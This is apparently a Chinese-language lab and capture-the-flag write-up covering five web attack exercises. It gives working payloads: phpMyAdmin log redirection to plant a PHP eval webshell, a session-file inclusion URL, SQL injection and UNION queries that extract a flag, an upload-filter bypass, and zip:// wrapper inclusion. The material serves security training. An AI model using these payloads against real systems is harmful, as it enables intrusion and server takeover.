Day-1 漏洞攻击实战

实训任务1 漏洞攻击实战一

使用 御剑 得到网站后台地址

数据库登录与日志配置​

  • 使用默认密码 root:root 登录phpMyAdmin,执行 SHOW VARIABLES LIKE 'general%' 查看日志状态。
  • 开启日志功能:set global general_log = "ON";(配图:SQL执行成功提示)。

​日志写入Webshell​

  • 修改日志路径到Web目录:

set global general_log_file='C:/phpStudy/PHPTutorial/WWW/shell.php';

  • 执行 SELECT '<?php @eval($_POST[1]);?>' 写入木马。

​连接Webshell​

  • 访问 http://靶机IP/shell.php,使用中国蚁剑成功连接。

实训任务2 漏洞攻击实战二

御剑扫描网站后台

发现存在www.zip文件(管理员备份文件)

存在数据库后台登录账号密码

运行SELECT " <?php file_put_contents('shell.php','<?php @eval($_POST[1]);?>');?>"
生成shell.php文件(未生成)

构造url运行存在session的sql命令生成shell文件

http://xxx.xx.xx.xxx:xxx/phpmyadmin/index.php?target=db_sql.php%253f/../../../../../../../../var/lib/php/sessions/sess_此处为步骤7获取到的sessionID

​连接Webshell​

访问 http://靶机IP/shell.php,使用中国蚁剑成功连接。

实训任务3 白云新闻搜索

​绕过过滤与注入验证​

  • 发现输入被转义,使用'触发报错。
  • 设置浏览器禁止使用JavaScript
    • 构造永真条件:' OR 1=1 -- ',确认存在注入。

​Union查询提取数据​

  • 确定列数后,联合查询表名:

    sql 复制代码
    ' union select 1,TABLE_SCHEMA,TABLE_NAME from INFORMATION_SCHEMA.tables -- '
    
    ' union select 1,COLUMN_NAME,3 from INFORMATION_SCHEMA.columns -- '
    
    ' union select 1,2,flag from admin -- '

得到flag{fabbf4abe040f2fdac8234099facdccb}

实训任务4 手速要快

​绕过前端验证​

  • 修改文件后缀为.php.jpg <?php @eval($_POST[123]);?>

​访问Webshell​

实训任务5 包罗万象

将php文件压缩上传

​上传ZIP并触发解压​

上传包含shell.php的ZIP文件,利用伪协议包含:

sql 复制代码
http://192.168.210.84/index.php?url=zip:///var/www/html/upload/eee6b96824b2ab9ab6db41e36355eb89.zip%231

%23 转译为# '1' 应该与压缩包内的php文件同名

​获取服务器权限​

  • 通过中国蚁剑管理服务器文件系统。
相关推荐
ISACA中国2 小时前
2026年网络安全与AI趋势预测
人工智能·安全·web安全
Ares-Wang3 小时前
网络》》以太网交换安全
网络·安全
科技小E5 小时前
EasyGBS助力构建应急管理与安全生产全域防控体系
安全
能年玲奈喝榴莲牛奶6 小时前
安全服务-应急响应
web安全·网络安全·应急响应·安全服务
亚远景aspice6 小时前
亚远景-满足ASPICE要求的配置管理(SUP.8)与变更管理策略
大数据·网络·安全·汽车
金智维科技官方6 小时前
安全稳定,是企业部署智能体的基础
人工智能·安全·ai·ai agent·智能体·数字员工
沈千秋.7 小时前
【无标题】
安全
网安小白的进阶之路7 小时前
B模块 安全通信网络 第二门课 核心网路由技术-2-BGP-邻居-全互联
网络·安全·智能路由器
会飞的老朱8 小时前
从被动应对到主动防控:大型制造集团安全管理数字化升级实践
人工智能·安全·制造·oa协同办公
小快说网安8 小时前
硬核解析:高防 IP 是如何拦截 DDoS 攻击的?从清洗中心到流量调度
网络·tcp/ip·网络安全·ddos